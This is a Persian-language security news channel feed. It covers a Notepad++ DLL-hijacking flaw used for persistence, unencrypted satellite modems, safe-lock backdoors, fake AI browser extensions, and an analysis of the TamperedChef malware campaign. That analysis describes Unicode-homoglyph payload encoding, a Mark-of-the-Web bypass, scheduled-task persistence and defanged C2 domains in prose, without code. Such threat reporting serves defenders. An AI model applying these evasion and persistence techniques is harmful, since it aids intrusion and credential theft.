تهدید اصلی ناشی از این آسیب‌پذیری، اجرای کد محلی است. مهاجمی که پیش‌تر از طریق بدافزار، فیشینگ یا سایر روش‌ها، دسترسی اولیه به سیستم را به دست آورده باشد، می‌تواند از این نقص برای تثبیت دسترسی استفاده کند.

با Hijack کردن یک DLL در برنامه‌ای پرکاربرد مانند ++Notepad ، کد مهاجم هر بار که کاربر ویرایشگر را باز می‌کند اجرا خواهد شد و این امر بقا و ماندگاری بدافزار را پس از راه‌اندازی مجدد سیستم تضمین می‌کند.

اگرچه این در تست بر روی Notepad++ v8.8.3 نصب شده از طریق نصاب رسمی انجام شده است، اما مشکل زمینه‌ای، اساساً به نحوه بارگذاری مؤلفه‌های برنامه مرتبط است، که نشان می‌دهد هر نسخه نصب شده‌ای می‌تواند آسیب‌پذیر باشد.

### در حال حاضر در این لحظه، هیچ پچ رسمی از سوی توسعه‌دهندگان ++Notepad برای رفع CVE-2025-56383 منتشر نشده است.

@NullError_ir

✅#SatelliteModems

تحقیقات جامع در مورد مودم‌های ماهواره‌ای تجاری موجود در بازار نشان دهنده آسیب‌پذیری‌های امنیتی زیادی در این تجهیزات است.

نکته : رمزگذاری در بسیاری از مودم‌های ماهواره‌ای تجاری به طور پیش‌فرض غیرفعال است - و گاهی اوقات فعال کردن آن هزینه اضافی دارد. در نتیجه، بسیاری از کاربران هرگز رمزگذاری را فعال نمی‌کنند .

تحلیل جامع آسیب‌پذیری‌ها و حملات امنیتی در مودم‌های ماهواره‌ای (به زبان انگلیسی)👇

@NullError_ir

✅#Cracks

✈️ این رو هم ببینید جالبه

▶️ شکستن قفل گاوصندوق

✅ نکته : وقتی شرکت‌های امنیتی بر روی محصولاتشان راهی برای

Reset/Forget/Recovery Password

می‌گذارند و هکرها از آن به عنوان

Backdoor
استفاده می‌کنند .

✈️ @NullError_ir

  

✅#TamperedChef

بدافزار TamperedChef

کمپین جدید بدافزار TamperedChef یک نمونه بارز از رویکرد مهاجمان برای ادغام تکنیک‌های مهندسی نرم‌افزار مدرن با مکانیزم‌های گریز پیشرفته است. این بدافزار با استفاده از برنامه‌های کاربردی تروجان‌شده (Trojanized Productivity Tools) مانند Calendaromatic.exe و ImageLooker.exe ، به طور هدفمند دفاع‌های امنیتی سنتی را دور می‌زند.

۱. دسترسی اولیه

طعمه طعمه‌های این کمپین ابزارهای بهره‌وری به‌ظاهر بی‌ضرر مانند تقویم و نمایشگر تصویر هستند.

توزیع فایل‌های مخرب از طریق آرشیوهای 7-Zip توزیع می‌شوند.

سوءاستفاده از نقص امنیتی نکته فنی کلیدی در این مرحله، بهره‌برداری از آسیب‌پذیری CVE-2025-0411 در مکانیزم Mark of the Web (MotW) ویندوز است.

* مکانیزم MotW: این مکانیزم برای علامت‌گذاری فایل‌هایی است که از اینترنت دانلود شده‌اند و به ویندوز هشدار می‌دهد که باید کنترل‌های امنیتی سخت‌گیرانه‌تری (مانند SmartScreen ) را اعمال کند.

* حمله: با سوءاستفاده از نقص در نحوه مدیریت فایل‌های 7-Zip، بدافزار می‌تواند بدون فعال کردن هشدارهای امنیتی مبتنی بر اعتبار (Reputation-Based Security Controls)، اجرا شود و این کار، مرحله Initial Access را برای مهاجم به شدت تسهیل می‌کند.

۲. پیچیدگی فنی: استفاده از NeutralinoJS و مهندسی بدافزار

چارچوب ساخت بدافزار هر دو فایل Calendaromatic.exe و ImageLooker.exe با استفاده از NeutralinoJS ساخته شده‌اند.

*۔ NeutralinoJS یک چارچوب دسکتاپ سبک‌وزن که به توسعه‌دهندگان اجازه می‌دهد تا برنامه‌های دسکتاپ بومی (Native Desktop Applications) را با استفاده از HTML، CSS و JavaScript بسازند.

* مزیت برای مهاجم این انتخاب به بدافزار اجازه می‌دهد تا ضمن حفظ ظاهر کاملاً قانونی یک نرم‌افزار دسکتاپ، از قدرت و انعطاف‌پذیری جاوا اسکریپت برای اجرای بارهای مخرب و تعامل مستقیم با APIهای سیستم‌عامل استفاده کند. این یک تکنیک Defense Evasion عالی است، زیرا بسیاری از راهکارهای امنیتی، رفتار چارچوب‌های توسعه مشروع را به‌دقت مانیتور نمی‌کنند.

* امضای دیجیتال استفاده از امضاهای دیجیتال معتبر (اگرچه از نهادهای مشکوک مانند CROWN SKY LLC و LIMITED LIABILITY COMPANY APPSOLUTE) به منظور فریب کاربر و همچنین دور زدن فیلترهای امنیتی مبتنی بر اعتبار و شهرت است.

۳. مکانیزم گریز پیشرفته از طریق یونیکد

یکی از پیشرفته‌ترین تکنیک‌های گریز در این بدافزار، استفاده از هموگلیف‌های یونیکد (Unicode Homoglyphs) است:

* عملکرد: بدافزار بارهای مخرب (Malicious Payloads) خود را در پاسخ‌های API که به‌ظاهر بی‌خطر هستند، با استفاده از هموگلیف‌های یونیکد رمزگذاری (Encode) می‌کند.

* گریز از تشخیص: این تکنیک به بدافزار اجازه می‌دهد تا از سیستم‌های تشخیص مبتنی بر رشته (String-Based Detection) و الگوریتم‌های تطبیق امضا (Signature Matching) عبور کند. این ابزارها برای شناسایی الگوهای مشخص در ترافیک شبکه یا فایل‌ها طراحی شده‌اند. وقتی داده‌ها با کاراکترهای یونیکد جایگزین می‌شوند (که شبیه کاراکترهای عادی هستند اما کد متفاوتی دارند)، تشخیص سنتی شکست می‌خورد.

* کانال اجرای مخفی: هنگام اجرا، بدافزار این پیلودهای پنهان را رمزگشایی کرده و آن‌ها را از طریق زمان اجرای NeutralinoJS اجرا می‌کند و عملاً یک کانال اجرای مخفی (Covert Execution Channel) ایجاد می‌کند که زیر رادار سیستم‌های نظارتی مرسوم کار می‌کند.

۴. پایداری و استخراج داده

* پایداری بدافزار از طریق ایجاد وظایف زمان‌بندی‌شده (Scheduled Tasks) و تغییرات در رجیستری ویندوز (Registry Modifications) ، پایداری خود را تضمین می‌کند. استفاده از پرچم‌های خط فرمان (Command-line Flags) مانند --install ، --enableupdate و --fullupdate نشان می‌دهد که مهاجم یک معماری مدولار و قابل کنترل برای مدیریت وضعیت بدافزار دارد.

* فرمان و کنترل : پس از نصب موفق، بدافزار به سرعت با سرورهای فرمان و کنترل (مانند calendaromatic[.]com و movementxview[.]com) ارتباط برقرار می‌کند.

* رمزگذاری C2: این ارتباطات از طریق کانال‌های رمزگذاری‌شده (Encrypted Channels) انجام می‌شود، که تلاش تیم‌های آبی (Blue Teams) برای شناسایی محتوای داده‌های ارسالی یا دستورات دریافتی را به شدت پیچیده می‌کند.

* تأثیر مخرب (Impact): تأثیر بدافزار شامل:

* سرقت اعتبارنامه‌ها و Session Tokens: استخراج اطلاعات ذخیره‌شده حساس از مرورگرها.

* ربایش مرورگر (Browser Hijacking): تغییر تنظیمات مرورگر و هدایت ترافیک وب برای تسهیل فعالیت‌های مخرب مستمر.

* دسترسی دائمی Backdoor: فراهم کردن امکان استخراج داده و اجرای دستورات از راه دور.

@NullError_ir

✅#Ai_Extensions

افزونه‌های جعلی هوش مصنوعی در مرورگرها

مهاجمان در حال انتشار افزونه‌های مخرب برای خصوصا مرورگر کروم هستند که خود را به جای ابزارهای معروف هوش مصنوعی مانند ChatGPT، Claude و Perplexity جا می‌زنند.

روش حمله: این افزونه‌ها پس از نصب، به‌طور مخفیانه موتور جستجوی پیش‌فرض مرورگر شما را تغییر می‌دهند. در نتیجه، تمام جستجوهای شما ابتدا از سرورهای مهاجم عبور می‌کند.

خطر اصلی: این کار به مهاجمان اجازه می‌دهد تمام اطلاعاتی که جستجو می‌کنید (شامل داده‌های شخصی، اطلاعات کاری و محرمانه) را سرقت کنند. این یک حمله از نوع Man-in-the-Middle است.

نحوه توزیع: این افزونه‌های مخرب اغلب از طریق تبلیغات فریبنده و ویدیوهای تبلیغاتی در یوتیوب پخش می‌شوند.

از نصب افزونه‌های ناشناس برای دسترسی به سرویس‌های محبوب خودداری کنید. همیشه قبل از نصب، مجوزهای درخواستی افزونه را به‌دقت بررسی کنید، به‌خصوص اگر درخواست تغییر تنظیمات مرورگر را داشته باشد. تنها از منابع رسمی و کاملاً معتبر افزونه نصب کنید.

اطلاعات بیشتر و شناسایی نمونه‌ها

@NullError_ir

✅#Motorola

دوستانی هم که به این موضوعات علاقه دارند

کالبد شکافی رادیو بیسیم موتورولا

@NullError_ir